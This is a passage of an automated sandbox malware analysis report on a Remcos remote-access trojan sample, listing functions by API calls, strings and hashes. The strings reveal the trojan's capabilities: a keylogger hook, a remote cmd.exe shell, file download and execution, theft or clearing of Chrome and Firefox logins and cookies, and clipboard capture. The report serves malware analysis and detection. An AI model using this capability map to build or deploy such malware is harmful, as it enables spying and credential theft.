                                                                                            • Part of subcall function 00412268: RegCloseKey.ADVAPI32(?,?,?,?,0040B093,004638E0,00000001,000000AF,00463050), ref: 0041229C
                                                                                          • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00410BAB
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00410BBA
                                                                                          • CreateThread.KERNEL32(00000000,00000000,00411253,00000000,00000000,00000000), ref: 00410C10
                                                                                          • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 00410E7F
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                                                                                          • String ID: (#G$Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe$!G
                                                                                          • API String ID: 3018269243-1736093966
                                                                                          • Opcode ID: 0994219a8e8a2e6fdacb02da6b6c9aac93029fb7835260760d01e793a2ba6ee3
                                                                                          • Instruction ID: e4f63523a9081b51a3adb9d06d528b7104d503695ba60a117a14e5ebfa22ea95
                                                                                          • Opcode Fuzzy Hash: 0994219a8e8a2e6fdacb02da6b6c9aac93029fb7835260760d01e793a2ba6ee3
                                                                                          • Instruction Fuzzy Hash: DD71923160430167C604FB62DD67DAE73A8AE91308F50097FF546621E2EEBC9E49C69F
                                                                                          Function 00406D28 Relevance: 32.3, APIs: 9, Strings: 9, Instructions: 810fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SetEvent.KERNEL32(?,?), ref: 00406D4A
                                                                                          • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00406E18
                                                                                          • DeleteFileW.KERNEL32(00000000), ref: 00406E3A
                                                                                            • Part of subcall function 0041A01B: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,00471E78,?), ref: 0041A076
                                                                                            • Part of subcall function 0041A01B: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,00471E78,?), ref: 0041A0A6
                                                                                            • Part of subcall function 0041A01B: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,00471E78,?), ref: 0041A0FB
                                                                                            • Part of subcall function 0041A01B: FindClose.KERNEL32(00000000,?,?,?,?,?,00471E78,?), ref: 0041A15C
                                                                                            • Part of subcall function 0041A01B: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,00471E78,?), ref: 0041A163
                                                                                            • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                                                                            • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                                                                            • Part of subcall function 00404A81: WaitForSingleObject.KERNEL32(?,00000000,00401A25,?,?,00000004,?,?,00000004,00473A38,00471E78,00000000), ref: 00404B27
                                                                                            • Part of subcall function 00404A81: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00473A38,00471E78,00000000,?,?,?,?,?,00401A25), ref: 00404B55
                                                                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00407228
                                                                                          • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 00407309
                                                                                          • DeleteFileA.KERNEL32(?), ref: 0040768E
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: File$Find$DeleteDirectoryEventRemove$AttributesCloseDriveExecuteFirstLocalLogicalNextObjectShellSingleStringsTimeWaitsend
                                                                                          • String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$open
                                                                                          • API String ID: 1385304114-1507758755
                                                                                          • Opcode ID: ed344af3b2e5fd50c32de0d2071b22cf1c649447e88408241c6b1e9951d97ab2
                                                                                          • Instruction ID: 48d75f04ed6415a86b5419c4bbb4b80b443badeb9edbc79095c7941e671ccbd4
                                                                                          • Opcode Fuzzy Hash: ed344af3b2e5fd50c32de0d2071b22cf1c649447e88408241c6b1e9951d97ab2
                                                                                          • Instruction Fuzzy Hash: EE42A771A043005BC604FB76C86B9AE77A9AF91304F40493FF542671E2EE7D9A09C79B
                                                                                          Function 0040567A Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 278pipesleepfileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __Init_thread_footer.LIBCMT ref: 004056C6
                                                                                            • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                                                                          • __Init_thread_footer.LIBCMT ref: 00405703
                                                                                          • CreatePipe.KERNEL32(00473BB4,00473B9C,00473AC0,00000000,00463068,00000000), ref: 00405796
                                                                                          • CreatePipe.KERNEL32(00473BA0,00473BBC,00473AC0,00000000), ref: 004057AC
                                                                                          • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00473AD0,00473BA4), ref: 0040581F
                                                                                          • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405877
                                                                                          • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0040589C
                                                                                          • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058C9
                                                                                            • Part of subcall function 00432525: __onexit.LIBCMT ref: 0043252B
                                                                                          • WriteFile.KERNEL32(00000000,00000000,?,00000000,00471F28,0046306C,00000062,00463050), ref: 004059C4
                                                                                          • Sleep.KERNEL32(00000064,00000062,00463050), ref: 004059DE
                                                                                          • TerminateProcess.KERNEL32(00000000), ref: 004059F7
                                                                                          • CloseHandle.KERNEL32 ref: 00405A03
                                                                                          • CloseHandle.KERNEL32 ref: 00405A0B
                                                                                          • CloseHandle.KERNEL32 ref: 00405A1D
                                                                                          • CloseHandle.KERNEL32 ref: 00405A25
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                                                          • String ID: SystemDrive$cmd.exe
                                                                                          • API String ID: 2994406822-3633465311
                                                                                          • Opcode ID: 45804b196eb615b74f37731f9156c820bde623197d48a39944e1cd78d62eaab2
                                                                                          • Instruction ID: 60b94bd4732a7a61eda53217d638a5a8398e5d64ba0573e0a23605d008395794
                                                                                          • Opcode Fuzzy Hash: 45804b196eb615b74f37731f9156c820bde623197d48a39944e1cd78d62eaab2
                                                                                          • Instruction Fuzzy Hash: 2991D571600204AFC710BF65AC52D6F3698EB44745F00443FF949A72E3DA7CAE489B6E
                                                                                          Function 0040AA71 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 146fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040AAF0
                                                                                          • FindClose.KERNEL32(00000000), ref: 0040AB0A
                                                                                          • FindNextFileA.KERNEL32(00000000,?), ref: 0040AC2D
                                                                                          • FindClose.KERNEL32(00000000), ref: 0040AC53
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Find$CloseFile$FirstNext
                                                                                          • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                                                          • API String ID: 1164774033-3681987949
                                                                                          • Opcode ID: ca0fae3423e82ba65057aab1becec6cc490b3020935d7fd6147cf858be723e25
                                                                                          • Instruction ID: fcfcc6101c27069c9b98dcbc284c26b589152974821445ccf2a2d41a2abcc6ea
                                                                                          • Opcode Fuzzy Hash: ca0fae3423e82ba65057aab1becec6cc490b3020935d7fd6147cf858be723e25
                                                                                          • Instruction Fuzzy Hash: DD516C7190021A9ADB14FBB1DC96EEEB738AF10309F50057FF406720E2FF785A458A5A
                                                                                          Function 0040AC78 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 131fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040ACF0
                                                                                          • FindClose.KERNEL32(00000000), ref: 0040AD0A
                                                                                          • FindNextFileA.KERNEL32(00000000,?), ref: 0040ADCA
                                                                                          • FindClose.KERNEL32(00000000), ref: 0040ADF0
                                                                                          • FindClose.KERNEL32(00000000), ref: 0040AE11
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Find$Close$File$FirstNext
                                                                                          • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                                          • API String ID: 3527384056-432212279
                                                                                          • Opcode ID: 73f140f6d35823a17bd4706e2565cdbe6c65283cd980cbef6400db2aba249c94
                                                                                          • Instruction ID: fb37dd61a783c7e48c67abb1194b5e9e6d585cff7aa156a37ad31c809035e36e
                                                                                          • Opcode Fuzzy Hash: 73f140f6d35823a17bd4706e2565cdbe6c65283cd980cbef6400db2aba249c94
                                                                                          • Instruction Fuzzy Hash: 33417E7190021A5ACB14FBB1DC56DEEB729AF11306F50057FF402B21D2EF789A468A9E
                                                                                          Function 00414EC1 Relevance: 18.1, APIs: 12, Instructions: 83clipboardmemoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • OpenClipboard.USER32 ref: 00414EC2
                                                                                          • EmptyClipboard.USER32 ref: 00414ED0
                                                                                          • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 00414EF0
                                                                                          • GlobalLock.KERNEL32(00000000), ref: 00414EF9
                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00414F2F
                                                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 00414F38
                                                                                          • CloseClipboard.USER32 ref: 00414F55
                                                                                          • OpenClipboard.USER32 ref: 00414F5C
                                                                                          • GetClipboardData.USER32(0000000D), ref: 00414F6C
                                                                                          • GlobalLock.KERNEL32(00000000), ref: 00414F75
                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00414F7E
                                                                                          • CloseClipboard.USER32 ref: 00414F84
                                                                                            • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                                                                          • String ID:
                                                                                          • API String ID: 3520204547-0
                                                                                          • Opcode ID: 7af418065d64d393ef04eab576563171d8b43fad0296cfc06dd8feeb27fac25d
                                                                                          • Instruction ID: 88f859f6ed4527f0268ca0f0dcff7fecf11b3a85ebb64268ee3e6238e9d0ca75
                                                                                          • Opcode Fuzzy Hash: 7af418065d64d393ef04eab576563171d8b43fad0296cfc06dd8feeb27fac25d
                                                                                          • Instruction Fuzzy Hash: C32162312043009BD714BF71DC5A9BE76A8AF90746F81093EF906931E3EF3889458A6A
                                                                                          Function 004175E1 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 204COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 0$1$2$3$4$5$6$7
                                                                                          • API String ID: 0-3177665633
                                                                                          • Opcode ID: d8735d6a0333336ade1e6f6e2efec2098777929bb537579fb175260dc37f0ebb
                                                                                          • Instruction ID: 7e6592d3055df16b324e67483fbf58bd1f951358f7384255f7d9d01b5e43b049
                                                                                          • Opcode Fuzzy Hash: d8735d6a0333336ade1e6f6e2efec2098777929bb537579fb175260dc37f0ebb
                                                                                          • Instruction Fuzzy Hash: 7661D4709183019ED704EF21D8A1FAB7BB4DF94310F10881FF5A25B2D1DA789A49CBA6
                                                                                          Function 004186FE Relevance: 15.2, APIs: 10, Instructions: 228serviceCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004727F8), ref: 00418714
                                                                                          • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 00418763
                                                                                          • GetLastError.KERNEL32 ref: 00418771
                                                                                          • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 004187A9
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                                                          • String ID:
                                                                                          • API String ID: 3587775597-0
                                                                                          • Opcode ID: a389468ef3a4b2ac6aa5ba8bc00e05a97baae6139e6da71d4e03c11964763bc0
                                                                                          • Instruction ID: 6ce88c058296d2c3b0169cbae3b24baff62e3479be35c2318cb4853598c639b3
                                                                                          • Opcode Fuzzy Hash: a389468ef3a4b2ac6aa5ba8bc00e05a97baae6139e6da71d4e03c11964763bc0
                                                                                          • Instruction Fuzzy Hash: 04814071104344ABC304FB62DC959AFB7E8FF94708F50092EF58552192EE78EA49CB9A
                                                                                          Function 0040B28E Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 112fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040B2DC
                                                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 0040B3AF
                                                                                          • FindClose.KERNEL32(00000000), ref: 0040B3BE
                                                                                          • FindClose.KERNEL32(00000000), ref: 0040B3E9
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Find$CloseFile$FirstNext
                                                                                          • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                                          • API String ID: 1164774033-405221262
                                                                                          • Opcode ID: 4b14aa1bc7189600b3df2c7baed1fce7e981b9bf703063a35819cb8b8327a43d
                                                                                          • Instruction ID: 883258bb694cc85cc249d311a8318fbda55549897f82b44e5d780b3967986c9e
                                                                                          • Opcode Fuzzy Hash: 4b14aa1bc7189600b3df2c7baed1fce7e981b9bf703063a35819cb8b8327a43d
                                                                                          • Instruction Fuzzy Hash: 7D31533190025996CB14FBA1DC9ADEE7778AF50718F10017FF405B21D2EFBC9A4A8A8D
                                                                                          Function 0041A01B Relevance: 13.6, APIs: 9, Instructions: 106fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,00471E78,?), ref: 0041A076
                                                                                          • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,00471E78,?), ref: 0041A0A6
                                                                                          • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,00471E78,?), ref: 0041A118
                                                                                          • DeleteFileW.KERNEL32(?,?,?,?,?,?,00471E78,?), ref: 0041A125
                                                                                            • Part of subcall function 0041A01B: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,00471E78,?), ref: 0041A0FB
                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,00471E78,?), ref: 0041A146
                                                                                          • FindClose.KERNEL32(00000000,?,?,?,?,?,00471E78,?), ref: 0041A15C
                                                                                          • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,00471E78,?), ref: 0041A163
                                                                                          • FindClose.KERNEL32(00000000,?,?,?,?,?,00471E78,?), ref: 0041A16C
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                                                          • String ID:
                                                                                          • API String ID: 2341273852-0
                                                                                          • Opcode ID: 2253f20c687efd1695f59cc813ac36ef13daa749edc7cb4b9e2c9040a42a2537
                                                                                          • Instruction ID: c5fafce0dbccb0860899da49af80cd87a4a733faaf08891c553187227cdc222a
                                                                                          • Opcode Fuzzy Hash: 2253f20c687efd1695f59cc813ac36ef13daa749edc7cb4b9e2c9040a42a2537
                                                                                          • Instruction Fuzzy Hash: 5F31937290121C6ADB20EBA0DC49EDB77BCAB08305F4406FBF558D3152EB39DAD48A19
                                                                                          Function 00410763 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 206memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00410201: SetLastError.KERNEL32(0000000D,00410781,00000000,$.F,?,?,?,?,?,?,?,?,?,?,?,0041075F), ref: 00410207
                                                                                          • SetLastError.KERNEL32(000000C1,00000000,$.F,?,?,?,?,?,?,?,?,?,?,?,0041075F), ref: 0041079C
                                                                                          • GetNativeSystemInfo.KERNEL32(?,?,00000000,$.F,?,?,?,?,?,?,?,?,?,?,?,0041075F), ref: 0041080A
                                                                                          • SetLastError.KERNEL32(0000000E), ref: 0041082E
                                                                                            • Part of subcall function 00410708: VirtualAlloc.KERNEL32(00000000,00000000,00000000,00000000,0041084C,?,00000000,00003000,00000004,00000000), ref: 00410718
                                                                                          • GetProcessHeap.KERNEL32(00000008,00000040), ref: 00410875
                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 0041087C
                                                                                          • SetLastError.KERNEL32(0000045A), ref: 0041098F
                                                                                            • Part of subcall function 00410ADC: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,0041099C), ref: 00410B4C
                                                                                            • Part of subcall function 00410ADC: HeapFree.KERNEL32(00000000), ref: 00410B53
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                                                                                          • String ID: $.F
                                                                                          • API String ID: 3950776272-1421728423
                                                                                          • Opcode ID: afa6d71e2a3b14814050e18c4da3df367c89416f336fbbd417f722f4d15fa1ad
                                                                                          • Instruction ID: 59628d97446cb481dba570c2b442d682f024dd9dc2812234181a156a821a4c1f
                                                                                          • Opcode Fuzzy Hash: afa6d71e2a3b14814050e18c4da3df367c89416f336fbbd417f722f4d15fa1ad
                                                                                          • Instruction Fuzzy Hash: F7619270200211ABD750AF66CD91BAB7BA5BF44714F54412AF9158B382DBFCE8C1CBD9
                                                                                          Function 00409340 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040935B
                                                                                          • SetWindowsHookExA.USER32(0000000D,0040932C,00000000), ref: 00409369
                                                                                          • GetLastError.KERNEL32 ref: 00409375
                                                                                            • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                                                                          • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004093C3
                                                                                          • TranslateMessage.USER32(?), ref: 004093D2
                                                                                          • DispatchMessageA.USER32(?), ref: 004093DD
                                                                                          Strings
                                                                                          • Keylogger initialization failure: error , xrefs: 00409389
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                                                          • String ID: Keylogger initialization failure: error
                                                                                          • API String ID: 3219506041-952744263
                                                                                          • Opcode ID: 4daa718d81045fd2d4cd741a07fca7de2266515ef5ec0dc15ecea471e6442c9d
                                                                                          • Instruction ID: 7386389ed158dc1e9b291cee6df9fe5cdc6a320468782ebba6dd7d831fd8f91b
                                                                                          • Opcode Fuzzy Hash: 4daa718d81045fd2d4cd741a07fca7de2266515ef5ec0dc15ecea471e6442c9d
                                                                                          • Instruction Fuzzy Hash: 4D119431604301ABC7107B769D0985BB7ECEB99712B500A7EFC95D32D2EB74C900CB6A
                                                                                          Function 004128E3 Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 485registrylibraryloaderCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004129B8
                                                                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004129C4
                                                                                            • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                                                                          • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 00412CBA
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 00412CC1
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressCloseCreateLibraryLoadProcsend
                                                                                          • String ID: SHDeleteKeyW$Shlwapi.dll
                                                                                          • API String ID: 2127411465-314212984
                                                                                          • Opcode ID: 4d1b54bdb48d1e71edff6421ab1f1888d78c8ca568d6030425719987dfaca1a1
                                                                                          • Instruction ID: 16181ac17c5890234a95f9c719cc05f83ad3eef33587bd03cd2ae8bf1541d7ce
                                                                                          • Opcode Fuzzy Hash: 4d1b54bdb48d1e71edff6421ab1f1888d78c8ca568d6030425719987dfaca1a1
                                                                                          • Instruction Fuzzy Hash: CCE1DA72A0430067CA14B776DD57DAF36A8AF91318F40053FF946F71E2EDBD8A44829A
                                                                                          Function 0040E18D Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 90sleepCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00411F34: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?), ref: 00411F54
                                                                                            • Part of subcall function 00411F34: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,00000000), ref: 00411F72
                                                                                            • Part of subcall function 00411F34: RegCloseKey.ADVAPI32(?), ref: 00411F7D
                                                                                          • Sleep.KERNEL32(00000BB8), ref: 0040E243
                                                                                          • ExitProcess.KERNEL32 ref: 0040E2B4
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CloseExitOpenProcessQuerySleepValue
                                                                                          • String ID: 3.8.0 Pro$override$pth_unenc$!G
                                                                                          • API String ID: 2281282204-1386060931
                                                                                          • Opcode ID: 2411e5703e7239f679d30a90bad3a95645d2e36138ee9f8a514be94ac54cb995
                                                                                          • Instruction ID: b884fba6e00cc138548ee74cf6c0f0a6577cc223cd772b3e63c92b5116f64211
                                                                                          • Opcode Fuzzy Hash: 2411e5703e7239f679d30a90bad3a95645d2e36138ee9f8a514be94ac54cb995
                                                                                          • Instruction Fuzzy Hash: 6E213770B4030027DA08B6768D5BAAE35899B82708F40446FF911AB2D7EEBD8D4583DF
                                                                                          Function 0041936B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69networkfileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00419392
                                                                                          • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 004193A8
                                                                                          • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 004193C1
                                                                                          • InternetCloseHandle.WININET(00000000), ref: 00419407
                                                                                          • InternetCloseHandle.WININET(00000000), ref: 0041940A
                                                                                          Strings
                                                                                          • http://geoplugin.net/json.gp, xrefs: 004193A2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Internet$CloseHandleOpen$FileRead
                                                                                          • String ID: http://geoplugin.net/json.gp
                                                                                          • API String ID: 3121278467-91888290
                                                                                          • Opcode ID: ef2ec91d27aa09046ea65f67fa3d050ef1f1622cef503f288a816c5549269c7a
                                                                                          • Instruction ID: 9fad89c028030122b1819b6a874fefb9d729214f45c39af6bed7b2b06c6e4f32
                                                                                          • Opcode Fuzzy Hash: ef2ec91d27aa09046ea65f67fa3d050ef1f1622cef503f288a816c5549269c7a
                                                                                          • Instruction Fuzzy Hash: 3311C8311053126BD224EF169C59DABBF9CEF85765F40053EF905A32C1DBA8DC44C6A9
                                                                                          Function 0040A953 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040A98F
                                                                                          • GetLastError.KERNEL32 ref: 0040A999
                                                                                          Strings
                                                                                          • UserProfile, xrefs: 0040A95F
                                                                                          • [Chrome StoredLogins not found], xrefs: 0040A9B3
                                                                                          • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040A95A
                                                                                          • [Chrome StoredLogins found, cleared!], xrefs: 0040A9BF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: DeleteErrorFileLast
                                                                                          • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                                                          • API String ID: 2018770650-1062637481
                                                                                          • Opcode ID: c755599410c6c02e55073cedb3b03e5beee3eb12ab5711b2b25ec6cbfe43ec22
                                                                                          • Instruction ID: b2134abed7c3f614b53a5a28bf05479c5c2a11b403a78876888f6ce5fd1f590e
                                                                                          • Opcode Fuzzy Hash: c755599410c6c02e55073cedb3b03e5beee3eb12ab5711b2b25ec6cbfe43ec22
